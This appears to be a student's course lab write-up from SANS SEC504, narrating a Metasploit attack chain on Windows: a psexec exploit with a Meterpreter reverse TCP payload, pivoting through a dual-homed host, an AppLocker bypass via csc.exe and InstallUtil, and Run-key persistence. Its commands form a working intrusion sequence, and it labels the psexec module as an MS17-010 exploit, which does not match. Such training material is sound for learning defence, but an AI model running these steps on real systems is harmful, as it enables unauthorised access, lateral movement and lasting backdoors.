SEC-504: Advanced Exploitation & Post-Exploitation
In the SANS SEC504 course, I utilized Metasploit, the industry-standard penetration testing framework, to execute complex attacks. Gaining initial access is just the beginning; the “Post-Exploitation” phase is where an attacker establishes control, moves laterally, and achieves their ultimate objective.
Here is the step-by-step methodology I used.
1. Metasploit Attack & Analysis
Objective: Launch a verified exploit against a vulnerable service.
I targeted a Windows system running a vulnerable SMB service (MS17-010).
Step 1: Configuration
I searched for the module and configured the target parameters.
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 10.10.0.1
msf6 > set SMBUser sec504
msf6 > set SMBPass sec504
Step 2: Payload Selection
I configured a Meterpreter reverse TCP payload. Meterpreter is an advanced, in-memory payload that provides a robust command shell without touching the disk.
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.75.1
Step 3: Execution
I launched the exploit.
msf6 > run
Result: Meterpreter session 1 opened. I now had full system control. I used getuid to verify I was running as NT AUTHORITY\SYSTEM.
2. Pivoting and Lateral Movement
Objective: Access a hidden internal network through a compromised host.
I had access to a web server that was “dual-homed” (connected to two networks). The database server I needed to reach was on a private internal subnet (192.168.1.0/24) that my attacking machine could not reach directly.
Step 1: Autoroute
Inside the Meterpreter session on the web server, I added a route to the internal subnet. This told Metasploit to route traffic for that network through the compromised session.
meterpreter > run autoroute -s 192.168.1.0/24
Step 2: Port Forwarding
I used port forwarding to map a local port on my machine to the destination port on the hidden database.
meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.1.50
Step 3: The Attack
I could now run tools against 127.0.0.1:3306 on my local machine, and the traffic was tunneled through the web server to the hidden database.
nmap -sV -p 3306 127.0.0.1
Result: I successfully scanned and compromised the internal database server, which was previously unreachable.
3. Application Allowlist Bypass (AppLocker)
Objective: Execute arbitrary code on a system protected by AppLocker.
I encountered a system where AppLocker blocked standard executables like nc.exe or meterpreter.exe.
Step 1: Reconnaissance
I enumerated the AppLocker policy to see what was allowed.
Get-AppLockerPolicy -Local
Finding: The policy allowed the execution of Microsoft-signed binaries in the C:\Windows\Microsoft.NET folder.
Step 2: The “InstallUtil” Bypass
I identified two permitted binaries: csc.exe (C# Compiler) and InstallUtil.exe.
I wrote a C# wrapper (Shellcode.cs) that contained my Meterpreter shellcode but was structured as a Windows Installer class.
Step 3: Compilation & Execution
I compiled the C# code on the target machine using the trusted compiler:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:shellcode.exe Shellcode.cs
I then executed the payload using InstallUtil, which proxies the execution, bypassing the allowlist.
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U shellcode.exe
Result: I received a reverse shell connection, bypassing the security controls.
4. Establishing Persistence
Objective: Maintain access even after the user reboots.
Attacking systems is noisy. Once I had a shell, I needed to ensure I could return later without re-exploiting the vulnerability.
Step 1: Persistence Module
I used a Metasploit post-exploitation module to install a backdoor.
msf6 > use post/windows/manage/persistence_exe
msf6 > set SESSION 1
msf6 > set REXEPATH /tmp/evil.exe
msf6 > run
Step 2: Verification
This created a Registry Run Key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) that automatically executes my payload (evil.exe) every time the user logs in. Even if the system reboots or the vulnerability is patched, my access remains secure.